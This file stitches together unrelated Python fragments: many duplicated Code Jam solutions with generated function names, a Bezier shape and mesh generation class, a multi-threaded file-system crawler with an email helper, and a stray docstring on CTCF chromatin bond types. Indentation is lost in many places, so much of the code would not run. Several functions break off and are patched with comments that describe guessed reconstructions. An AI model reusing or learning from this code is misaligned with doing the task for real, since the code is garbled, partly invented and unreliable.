def func_8f7d9b18b0f14b1e8ab440a10887730d(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return T
def func_70a941215b834f7eac54b7c1636adfb4(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return p
def func_b4cd67a31efc4ead91b67fbc22e24dac(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return q
def func_a22c619581fb44ae9f584033f0899eb8(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return r
def func_693ed1bad29e4b8a95d978208b7d6f86(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return a
def func_07cf1ae667834722a41368a3a3a52f0c(infile):
    T, = line(infile)
    for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
infile.close()
return b
def func_c172c6329ac8403aae7f07e75e313b64():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
return a
def func_6c62f09ceaea47129e83e1b939749cb9():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
return T
def func_01dc285a49b245bb9b0949a7ec01a023():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
        A = [((i * p + q) % r + s) for i in xrange(N)]
        # NOTE: the source is truncated at this point; the remainder of this
        # function below follows the pattern of the identical functions above.
        total = sum(A)
        totalsum = [a for a in A]
        for i in xrange(1, N):
            totalsum[i] += totalsum[i - 1]
        best = total
        b = 0
        for a in xrange(N):
            if b < a:
                b += 1
            while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1, total, totalsum):
                b += 1
            best = min(best, getsum(a, b, total, totalsum))
        best = total - best
        print >> stderr, 'Case #%d' % T
        print 'Case #%d: %.10f' % (T, 1.0 * best / total)
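# The functions above rely on two helpers, line() and getsum(), that are not
# shown in this excerpt. A minimal sketch of what they might look like, judged
# only from how they are called (an assumption, not the original code):
# line() parses whitespace-separated integers from the next input line, and
# getsum() plausibly returns the larger of the segment sum A[a..b] and its
# complement, which would make the two-pointer minimization above well defined.
#
# def line(infile):
#     return [int(x) for x in infile.readline().split()]
#
# def getsum(a, b, total, totalsum):
#     seg = totalsum[b] - (totalsum[a - 1] if a > 0 else 0)
#     return max(seg, total - seg)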
# Generic imports
import os, os.path
import math
import pygmsh
import meshio
import scipy.special
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
# Custom imports
from meshes_utils import *
### ************************************************
### Class defining shape object
class Shape:
### ************************************************
### Constructor
def __init__(self,
name ='shape',
control_pts =None,
n_control_pts =None,
n_sampling_pts=None,
radius =None,
edgy =None):
if (name is None): name = 'shape'
if (control_pts is None): control_pts = np.array([])
if (n_control_pts is None): n_control_pts = 0
if (n_sampling_pts is None): n_sampling_pts = 0
if (radius is None): radius = np.array([])
if (edgy is None): edgy = np.array([])
self.name = name
self.control_pts = control_pts
self.n_control_pts = n_control_pts
self.n_sampling_pts = n_sampling_pts
self.curve_pts = np.array([])
self.area = 0.0
self.index = 0
if (len(radius) == n_control_pts): self.radius = radius
if (len(radius) == 1): self.radius = radius*np.ones([n_control_pts])
if (len(edgy) == n_control_pts): self.edgy = edgy
if (len(edgy) == 1): self.edgy = edgy*np.ones([n_control_pts])
subname = name.split('_')
if (len(subname) == 2): # name is of the form shape_?.xxx
self.name = subname[0]
index = subname[1].split('.')[0]
self.index = int(index)
if (len(subname) > 2): # name contains several '_'
            print('Please do not use more than one "_" character in the shape name')
quit()
if (len(control_pts) > 0):
self.control_pts = control_pts
self.n_control_pts = len(control_pts)
### ************************************************
### Reset object
def reset(self):
self.name = 'shape'
self.control_pts = np.array([])
self.n_control_pts = 0
self.n_sampling_pts = 0
self.radius = np.array([])
self.edgy = np.array([])
self.curve_pts = np.array([])
self.area = 0.0
### ************************************************
### Generate shape
def generate(self, *args, **kwargs):
# Handle optional argument
centering = kwargs.get('centering', True)
cylinder = kwargs.get('cylinder', False)
magnify = kwargs.get('magnify', 1.0)
# Generate random control points if empty
if (len(self.control_pts) == 0):
if (cylinder):
self.control_pts = generate_cylinder_pts(self.n_control_pts)
else:
self.control_pts = generate_random_pts(self.n_control_pts)
# Magnify
self.control_pts *= magnify
# Center set of points
if (centering):
center = np.mean(self.control_pts, axis=0)
self.control_pts -= center
# Sort points counter-clockwise
#control_pts, radius, edgy = ccw_sort(self.control_pts,
# self.radius,
# self.edgy)
control_pts = np.array(self.control_pts)
radius = np.array(self.radius)
edgy = np.array(self.edgy)
#self.control_pts = control_pts
#self.radius = radius
#self.edgy = edgy
        # Create a copy of control_pts for further modification
        augmented_control_pts = np.copy(control_pts)
# Add first point as last point to close curve
augmented_control_pts = np.append(augmented_control_pts,
np.atleast_2d(augmented_control_pts[0,:]), axis=0)
# Compute list of cartesian angles from one point to the next
vector = np.diff(augmented_control_pts, axis=0)
angles = np.arctan2(vector[:,1],vector[:,0])
wrap = lambda angle: (angle >= 0.0)*angle + (angle < 0.0)*(angle+2*np.pi)
angles = wrap(angles)
# Create a second list of angles shifted by one point
# to compute an average of the two at each control point.
# This helps smoothing the curve around control points
angles1 = angles
angles2 = np.roll(angles,1)
angles = edgy*angles1 + (1.0-edgy)*angles2 + (np.abs(angles2-angles1) > np.pi)*np.pi
# Add first angle as last angle to close curve
angles = np.append(angles, [angles[0]])
# Compute curve segments
local_curves = []
for i in range(0,len(augmented_control_pts)-1):
local_curve = generate_bezier_curve(augmented_control_pts[i,:],
augmented_control_pts[i+1,:],
angles[i],
angles[i+1],
self.n_sampling_pts,
radius[i])
local_curves.append(local_curve)
curve = np.concatenate([c for c in local_curves])
x, y = curve.T
z = np.zeros(x.size)
self.curve_pts = np.column_stack((x,y,z))
self.curve_pts = remove_duplicate_pts(self.curve_pts)
# Compute area
self.compute_area()
### ************************************************
### Write image
def generate_image(self, *args, **kwargs):
# Handle optional argument
special_pt = kwargs.get('special_pt', None)
plot_pts = kwargs.get('plot_pts', False)
override_name = kwargs.get('override_name', '')
        show_quadrants = kwargs.get('show_quadrants', False)
quad_radius = kwargs.get('quad_radius', 1.0)
xmin = kwargs.get('xmin', -5.0)
xmax = kwargs.get('xmax', 10.0)
ymin = kwargs.get('ymin', -5.0)
ymax = kwargs.get('ymax', 5.0)
# Plot shape
plt.xlim([xmin,xmax])
plt.ylim([ymin,ymax])
plt.axis('off')
plt.gca().set_aspect('equal', adjustable='box')
plt.fill(self.curve_pts[:,0],
self.curve_pts[:,1],
'black',
linewidth=2.5)
# Plot points
# Each point gets a different color
if (plot_pts):
colors = matplotlib.cm.ocean(np.linspace(0,1,self.n_control_pts))
plt.scatter(self.control_pts[:,0],
self.control_pts[:,1],
color=colors)
# Plot special point
        if (special_pt is not None):
plt.plot(self.control_pts[special_pt,0],
self.control_pts[special_pt,1],
'o',
color=(1.0,0.494,0.180))
# Plot quadrants
if (show_quadrants):
for pt in range(self.n_control_pts):
dangle = (360.0/float(self.n_control_pts))
angle = dangle*float(pt)+dangle/2.0
x = quad_radius*math.cos(math.radians(angle))
y = quad_radius*math.sin(math.radians(angle))
plt.plot([0, x],[0, y],color='w')
circle = plt.Circle((0,0),quad_radius,fill=False,color='w')
plt.gcf().gca().add_artist(circle)
# Save image
filename = self.name+'_'+str(self.index)+'.png'
if (override_name != ''): filename = override_name
plt.savefig(filename,
dpi=200,
bbox_inches='tight',
pad_inches=0,
facecolor=(0.784,0.773,0.741))
plt.clf()
### ************************************************
### Write csv
def write_csv(self):
with open(self.name+'_'+str(self.index)+'.csv','w') as file:
# Write header
file.write('{} {}\n'.format(self.n_control_pts,
self.n_sampling_pts))
# Write radii
for i in range(0,self.n_control_pts):
file.write('{}\n'.format(self.radius[i]))
# Write edgy
for i in range(0,self.n_control_pts):
file.write('{}\n'.format(self.edgy[i]))
# Write control points coordinates
for i in range(0,self.n_control_pts):
file.write('{} {}\n'.format(self.control_pts[i,0],
self.control_pts[i,1]))
### ************************************************
### Read csv and initialize shape with it
def read_csv(self, filename, *args, **kwargs):
# Handle optional argument
keep_numbering = kwargs.get('keep_numbering', False)
if (not os.path.isfile(filename)):
print('I could not find csv file: '+filename)
print('Exiting now')
exit()
self.reset()
sfile = filename.split('.')
sfile = sfile[-2]
sfile = sfile.split('/')
name = sfile[-1]
if (keep_numbering):
sname = name.split('_')
name = sname[0]
name = name+'_'+str(self.index)
x = []
y = []
radius = []
edgy = []
with open(filename) as file:
header = file.readline().split()
n_control_pts = int(header[0])
n_sampling_pts = int(header[1])
for i in range(0,n_control_pts):
rad = file.readline().split()
radius.append(float(rad[0]))
for i in range(0,n_control_pts):
edg = file.readline().split()
edgy.append(float(edg[0]))
for i in range(0,n_control_pts):
coords = file.readline().split()
x.append(float(coords[0]))
y.append(float(coords[1]))
control_pts = np.column_stack((x,y))
self.__init__(name,
control_pts,
n_control_pts,
n_sampling_pts,
radius,
edgy)
### ************************************************
### Mesh shape
def mesh(self, *args, **kwargs):
# Handle optional argument
mesh_domain = kwargs.get('mesh_domain', False)
xmin = kwargs.get('xmin', -5.0)
xmax = kwargs.get('xmax', 10.0)
ymin = kwargs.get('ymin', -5.0)
ymax = kwargs.get('ymax', 5.0)
shape_h = kwargs.get('shape_h', 10.0)
domain_h = kwargs.get('domain_h', 20.0)
mesh_format = kwargs.get('mesh_format', 'mesh')
# Convert curve to polygon
mesh_size = 1.0
min_size = mesh_size*shape_h
geom = pygmsh.built_in.Geometry()
poly = geom.add_polygon(self.curve_pts,
mesh_size*shape_h,
make_surface=not mesh_domain)
# Mesh domain if necessary
if (mesh_domain):
# Compute an intermediate mesh size
border = geom.add_rectangle(xmin, xmax,
ymin, ymax,
0.0,
mesh_size*domain_h,
holes=[poly.line_loop])
# Generate mesh and write in medit format
try:
mesh = pygmsh.generate_mesh(geom,
extra_gmsh_arguments=["-v", "0"])
except AssertionError:
print('Meshing failed')
            return False, 0
else:
# Compute data from mesh
n_tri = len(mesh.cells['triangle'])
            # Remove vertex keyword from cells dictionary
            # to avoid warning message from meshio
del mesh.cells['vertex']
# Remove lines if output format is xml
if (mesh_format == 'xml'): del mesh.cells['line']
# Write mesh
filename = self.name+'_'+str(self.index)+'.'+mesh_format
meshio.write_points_cells(filename, mesh.points, mesh.cells)
return True, n_tri
### ************************************************
### Get shape bounding box
def compute_bounding_box(self):
x_max, y_max = np.amax(self.control_pts,axis=0)
x_min, y_min = np.amin(self.control_pts,axis=0)
dx = x_max - x_min
dy = y_max - y_min
return dx, dy
### ************************************************
### Modify shape given a deformation field
def modify_shape_from_field(self, deformation, *args, **kwargs):
# Handle optional argument
replace = kwargs.get('replace', False)
pts_list = kwargs.get('pts_list', [])
# Check inputs
if (pts_list == []):
if (len(deformation[:,0]) != self.n_control_pts):
print('Input deformation field does not have right length')
quit()
if (len(deformation[0,:]) not in [2, 3]):
print('Input deformation field does not have right width')
quit()
if (pts_list != []):
if (len(pts_list) != len(deformation)):
print('Lengths of pts_list and deformation are different')
quit()
# If shape is to be replaced entirely
if ( replace):
# If a list of points is provided
if (pts_list != []):
for i in range(len(pts_list)):
self.control_pts[pts_list[i],0] = deformation[i,0]
self.control_pts[pts_list[i],1] = deformation[i,1]
self.edgy[pts_list[i]] = deformation[i,2]
# Otherwise
if (pts_list == []):
self.control_pts[:,0] = deformation[:,0]
self.control_pts[:,1] = deformation[:,1]
self.edgy[:] = deformation[:,2]
# Otherwise
if (not replace):
# If a list of points to deform is provided
if (pts_list != []):
for i in range(len(pts_list)):
self.control_pts[pts_list[i],0] += deformation[i,0]
self.control_pts[pts_list[i],1] += deformation[i,1]
self.edgy[pts_list[i]] += deformation[i,2]
# Otherwise
if (pts_list == []):
self.control_pts[:,0] += deformation[:,0]
self.control_pts[:,1] += deformation[:,1]
self.edgy[:] += deformation[:,2]
# Increment shape index
self.index += 1
### ************************************************
### Compute shape area
def compute_area(self):
self.area = 0.0
# Use Green theorem to compute area
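        # Trapezoid form: summing (y1+y2)*(x2-x1) around a closed polygon
        # gives twice the signed area, so with the 2.0 prefactor below
        # self.area accumulates four times the signed area.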
for i in range(0,len(self.curve_pts)-1):
x1 = self.curve_pts[i-1,0]
x2 = self.curve_pts[i, 0]
y1 = self.curve_pts[i-1,1]
y2 = self.curve_pts[i, 1]
self.area += 2.0*(y1+y2)*(x2-x1)
### End of class Shape
### ************************************************
### ************************************************
### Compute distance between two points
def compute_distance(p1, p2):
return np.sqrt(np.sum((p2-p1)**2))
### ************************************************
### Generate n_pts random points in the unit square
def generate_random_pts(n_pts):
return np.random.rand(n_pts,2)
### ************************************************
### Generate cylinder points
def generate_cylinder_pts(n_pts):
if (n_pts < 4):
print('Not enough points to generate cylinder')
exit()
pts = np.zeros([n_pts, 2])
ang = 2.0*math.pi/n_pts
for i in range(0,n_pts):
pts[i,:] = [math.cos(float(i)*ang),math.sin(float(i)*ang)]
return pts
### ************************************************
### Compute minimal distance between successive pts in array
def compute_min_distance(pts):
dist_min = 1.0e20
for i in range(len(pts)-1):
p1 = pts[i ,:]
p2 = pts[i+1,:]
dist = compute_distance(p1,p2)
        dist_min = min(dist_min, dist)
    return dist_min
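### ************************************************
### Usage sketch (an assumption, not part of the original file; the helpers
### imported from meshes_utils, e.g. generate_bezier_curve, are not shown)
# shape = Shape(name='shape_0.csv', n_control_pts=6, n_sampling_pts=10,
#               radius=np.array([0.5]), edgy=np.array([1.0]))
# shape.generate(magnify=1.0)
# shape.generate_image(plot_pts=True)
# ok, n_tri = shape.mesh(mesh_domain=True, mesh_format='mesh')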
#! /usr/bin/env python3
# Script to crawl the file system for changed files
#
# fs-crawler dirkpetersen / Oct 2019
#
import sys, os, argparse, subprocess, re, time, datetime, tempfile, random, threading, filecmp
class KeyboardInterruptError(Exception): pass
def main():
#log = logger('fs-crawler', args.debug)
#log.info('starting to check folder %s for files older than %s days...' % (args.folder, args.days))
#log.debug('Parsed arguments: %s' % args)
start = time.time()
interval = 1
maxinterval = 10
lastcheck = 0
lastt = 0
currdir = os.getcwd()
curruser = os.getlogin() #pwd.getpwuid(os.getuid()).pw_name
tmpdir = tempfile.gettempdir()
days_back_as_secs = time.time() - (args.days * 24 * 3600)
days_back_datestr = str(datetime.date.today() + datetime.timedelta(args.days * -1)) # e.g. '2014-07-01'
filedict = {} # list of files to delete (grouped by key uid)
infodict = {} # contains list per uid: numfiles, sizefiles, numwarnfiles, sizewarnfiles
if args.folder == '/':
print('root folder not allowed !')
return False
numfiles=0
numfolders=0
for root, folders, files in mywalk(args.folder,noparallel=args.noparallel):
#print(root)
#for folder in folders:
#print ('...folder:%s' % folder)
# check if the user wanted to archive
numfolders+=1
numfiles+=len(files)
check = time.time()
if lastcheck+interval<check:
t=numfolders+numfiles
print ("folders: %s, files: %s, avg objects/s: %s, last objects/s: %s, current path: %s"
% (numfolders, numfiles, "{0:.0f}".format(t/(check-start)), "{0:.0f}".format((t-lastt)/(check-lastcheck)), root))
lastcheck=check
lastt=t
interval+=1
if maxinterval<=interval:
interval=maxinterval
if args.target:
troot = root.replace(args.folder,args.target)
if os.path.exists(troot):
dc = filecmp.dircmp(root, root.replace(args.folder,args.target), ignore=['.snapshot'])
if dc.left_list:
print ('*** Copy -> :', dc.left_list)
elif dc.right_list:
print ('*** Delete -> :', dc.right_list)
continue
for f in files:
p=os.path.join(root,f)
if args.nostat:
continue
stat=getstat(p)
if not stat:
continue
recent_time = stat.st_ctime
if stat.st_mtime > recent_time:
recent_time = stat.st_mtime
if stat.st_uid not in infodict:
infodict[stat.st_uid] = [0, 0, 0, 0]
if recent_time >= days_back_as_secs:
if stat.st_uid not in filedict:
filedict[stat.st_uid] = list()
filedict[stat.st_uid].append(p)
infodict[stat.st_uid][0]+=1
infodict[stat.st_uid][1]+=stat.st_size
infodict[stat.st_uid][2]+=1
infodict[stat.st_uid][3]+=stat.st_size
for k, v in filedict.items():
user=uid2user(k)
random.shuffle(v)
fn=len(v)
if fn>30:
fn=30
print("\n ##### FILES <= %s DAYS OLD ##########################################################" % args.days)
print("Total of %s files (%s GB total) owned by '%s'" % (infodict[k][0], "{0:.3f}".format(infodict[k][1]/float(1073741824)), user))
print('List of files that would have been backed up (max 30 randomly selected files):')
for i in range(fn):
print(v[i])
end = time.time()
print("\nTotal Time: %s sec (%s min)" % ("{0:.1f}".format(end-start),"{0:.1f}".format((end-start)/60)))
def startswithpath(pathlist, pathstr):
""" checks if at least one of the paths in a list of paths starts with a string """
for path in pathlist:
if (os.path.join(pathstr, '')).startswith(path):
return True
return False
def getstartpath(pathlist, pathstr):
""" return the path from pathlist that is the frist part of pathstr"""
for path in pathlist:
if (os.path.join(pathstr, '')).startswith(path):
return path
return ''
def getstat(path):
""" returns the stat information of a file"""
statinfo=None
try:
statinfo=os.lstat(path)
except (IOError, OSError) as e: # FileNotFoundError only since python 3.3
if args.debug:
sys.stderr.write(str(e))
except:
raise
return statinfo
def setfiletime(path,attr="atime"):
    """ sets the atime and/or mtime of a file to the current time """
    try:
        statinfo=getstat(path)
        now=time.time()
        # os.utime takes (atime, mtime); keep the other timestamp unchanged
        if attr=="all":
            os.utime(path,(now,now))
        elif attr=="atime":
            os.utime(path,(now,statinfo.st_mtime))
        elif attr=="mtime":
            os.utime(path,(statinfo.st_atime,now))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def uid2user(uidNumber):
""" attempts to convert uidNumber to username """
try:
import pwd
return pwd.getpwuid(int(uidNumber)).pw_name
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return str(uidNumber)
def list2file(mylist,path):
""" dumps a list into a text file, one line per item"""
try:
with open(path,'w') as f:
for item in mylist:
f.write("{}\r\n".format(item))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def pathlist2file(mylist,path,root):
""" dumps a list into a text file, one line per item, but removes
a root folder from all paths. Used for --files-from feature in rsync"""
try:
with open(path,'w') as f:
for item in mylist:
f.write("{}\r\n".format(item[len(root):]))
return True
except Exception as err:
sys.stderr.write(str(err))
sys.stderr.write('\n')
return False
def mywalk(top, noparallel=False, skipdirs=['.snapshot',]):
""" returns subset of os.walk """
if noparallel:
for root, dirs, files in os.walk(top,topdown=True,onerror=walkerr):
for skipdir in skipdirs:
if skipdir in dirs:
dirs.remove(skipdir) # don't visit this directory
yield root, dirs, files
else:
for root, dirs, files in walk(top):
for skipdir in skipdirs:
if skipdir in dirs:
dirs.remove(skipdir) # don't visit this directory
yield root, dirs, files
def walkerr(oserr):
sys.stderr.write(str(oserr))
sys.stderr.write('\n')
return 0
def walk(top, threads=36):
"""Multi-threaded version of os.walk().
from here: https://gist.github.com/jart/0a71cde3ca7261f77080a3625a21672b
This routine provides multiple orders of a magnitude performance improvement
when top is mapped to a network filesystem where i/o operations are slow, but
unlimited. For spinning disks it should still run faster regardless of thread
count because it uses a LIFO scheduler that guarantees locality. For SSDs it
will go tolerably slower.
The more exotic coroutine features of os.walk() can not be supported, such as
the ability to selectively inhibit recursion by mutating subdirs.
Args:
top: Path of parent directory to search recursively.
threads: Size of fixed thread pool.
Yields:
A (path, subdirs, files) tuple for each directory within top, including
itself. These tuples come in no particular order; however, the contents of
each tuple itself is sorted.
"""
if not os.path.isdir(top):
return
lock = threading.Lock()
on_input = threading.Condition(lock)
on_output = threading.Condition(lock)
state = {'tasks': 1}
paths = [top]
output = []
def worker():
while True:
with lock:
while True:
if not state['tasks']:
output.append(None)
on_output.notify()
return
if not paths:
on_input.wait()
continue
path = paths.pop()
break
try:
dirs = []
files = []
for item in os.listdir(path): #for item in sorted(os.listdir(path))
subpath = os.path.join(path, item)
if os.path.isdir(subpath):
dirs.append(item)
with lock:
state['tasks'] += 1
paths.append(subpath)
on_input.notify()
else:
files.append(item)
with lock:
output.append((path, dirs, files))
on_output.notify()
except OSError as e:
print(e, file=sys.stderr)
finally:
with lock:
state['tasks'] -= 1
if not state['tasks']:
on_input.notifyAll()
workers = [threading.Thread(target=worker,
name="fastio.walk %d %s" % (i, top))
for i in range(threads)]
for w in workers:
w.start()
while threads or output: # TODO(jart): Why is 'or output' necessary?
with lock:
while not output:
on_output.wait()
item = output.pop()
if item:
yield item
else:
threads -= 1
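# Example (illustrative): count files under a directory with the threaded walker.
# nfiles = 0
# for _root, _dirs, _files in walk('/tmp', threads=8):
#     nfiles += len(_files)
# print('files found: %d' % nfiles)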
def send_mail(to, subject, text, attachments=[], cc=[], bcc=[], smtphost="", fromaddr=""):
if sys.version_info[0] == 2:
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
else:
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders as Encoders
from string import Template
import socket
import smtplib
if not isinstance(to,list):
print("the 'to' parameter needs to be a list")
return False
if len(to)==0:
print("no 'to' email addresses")
return False
myhost=socket.getfqdn()
if smtphost == '':
smtphost = get_mx_from_email_or_fqdn(myhost)
if not smtphost:
sys.stderr.write('could not determine smtp mail host !\n')
if fromaddr == '':
fromaddr = os.path.basename(__file__) + '-no-reply@' + \
'.'.join(myhost.split(".")[-2:]) #extract domain from host
tc=0
for t in to:
if '@' not in t:
# if no email domain given use domain from local host
to[tc]=t + '@' + '.'.join(myhost.split(".")[-2:])
tc+=1
message = MIMEMultipart()
message['From'] = fromaddr
message['To'] = COMMASPACE.join(to)
message['Date'] = formatdate(localtime=True)
message['Subject'] = subject
message['Cc'] = COMMASPACE.join(cc)
message['Bcc'] = COMMASPACE.join(bcc)
body = Template('This is a notification message from $application, running on \n' + \
'host $host. Please review the following message:\n\n' + \
'$notify_text\n\nIf output is being captured, you may find additional\n' + \
'information in your logs.\n'
)
host_name = socket.gethostname()
full_body = body.substitute(host=host_name.upper(), notify_text=text, application=os.path.basename(__file__))
message.attach(MIMEText(full_body))
for f in attachments:
part = MIMEBase('application', 'octet-stream')
part.set_payload(open(f, 'rb').read())
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
message.attach(part)
addresses = []
for x in to:
addresses.append(x)
for x in cc:
addresses.append(x)
for x in bcc:
addresses.append(x)
smtp = smtplib.SMTP(smtphost)
smtp.sendmail(fromaddr, addresses, message.as_string())
smtp.close()
return True
def get_mx_from_email_or_fqdn(addr):
"""retrieve the first mail exchanger dns name from an email address."""
# Match the mail exchanger line in nslookup output.
MX = re.compile(r'^.*\s+mail exchanger = (?P<priority>\d+) (?P<host>\S+)\s*$')
# Find mail exchanger of this email address or the current host
if '@' in addr:
domain = addr.rsplit('@', 2)[1]
else:
domain = '.'.join(addr.rsplit('.')[-2:])
p = os.popen('/usr/bin/nslookup -q=mx %s' % domain, 'r')
mxes = list()
for line in p:
m = MX.match(line)
if m is not None:
mxes.append(m.group('host')[:-1]) #[:-1] just strips the ending dot
if len(mxes) == 0:
return ''
else:
return mxes[0]
def logger(name=None, stderr=False):
    import logging, logging.handlers
    # NOTE: the source is truncated here; the body below is a minimal
    # reconstruction based on the commented-out usage in main() above
    # (log = logger('fs-crawler', args.debug); log.info(...); log.debug(...)).
    log = logging.getLogger(name)
    log.setLevel(logging.DEBUG if stderr else logging.INFO)
    handler = logging.StreamHandler(sys.stderr)
    handler.setFormatter(logging.Formatter('%(name)s: %(levelname)s: %(message)s'))
    log.addHandler(handler)
    return log
oriented in the tandem left configuration;
i.e., having the "... < .... < ..." type of interaction that
_probably_ results in a _parallel_ chain configuration. This
configuration results in a far less strongly binding interaction
(about 1/3) but is also often observed in the experimental data.
'r': This is a CTCF cluster oriented in the tandem right
configuration; i.e., having the "... > .... > ..." type of
interaction that _probably_ results in a _parallel_ chain
configuration. This configuration results in a far less strongly
binding interaction (about 1/3) but is also often observed in the
experimental data.
'rp2': RNApolII
's': This is the "simple" pair bond type. These loop structures are
assumed to have the chromatin chains oriented in an unspecified
orientation (parallel loop or antiparallel loop direction) and the
interactions are presumed to be weak. Note that 's' could also refer
to divergent CTCF interactions; i.e., having the "< ... >" type of
interaction that results in weakly interacting antiparallel chain
configurations similar to the convergent CTCF structures only with far
less binding free energy.
'sa', 'sp': Stem direction specifier. It is important to specify
whether the collection of pairs is oriented parallel or
antiparallel. Therefore, we must add a qualifier to this notation; i.e.,
for structures containing the key 'S', we should specify 'sa' (for
simple antiparallel) and 'sp' (for simple parallel).
't' (i.e., "tandem" or "parallel"): This refers to tandem
configurations wherein the particular orientation of the CTCF binding
sites is unknown. In such cases, the program will automatically assign
this label, since the binding energy of 'l' and 'r' are basically
identical at the current level of understanding.
'wyspa': CTCF island.
These additional "bond types" permit us to distinguish between
direction and type of interaction: i.e., RNApolII, CTCF "convergent",
CTCF "tandem".
# #########
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#################################################
############# LINKAGE DEFINITIONS #############
#################################################
160715wkd: I added this additional object because the program will
have to be expanded to handle convergent and tandem structures that
are coupled, and also because some structures will turn out to be
degenerate, so the program should be able to classify multiple
structures with the same energy within the same class. However, I
need to process the structures properly. Therefore, Link contains a
list of objects that have the same free energy Vij and Motif()
represents the objects contained in Link().
==================================================================
180815: I think we can use a dictionary to identify objects in
motif. It is true that the handshakes need to be identical, but they
can be accessed with the proper interface.
motifDict = { 'B' : bond(), 'P' : MBL(), 'S' : Stem() ... }
lg[0].motif[0].get_branches()
get_branches(self):
return motifDict['M'].get_branches()
# ==================================================================
"""
def motif_error(name, Ob):
    if Ob is not None:
        print ("Motif error(%s)" % name, Ob.base)
        print (type(Ob))
        print (Ob)
    else:
        print ("Motif error(%s)" % name)
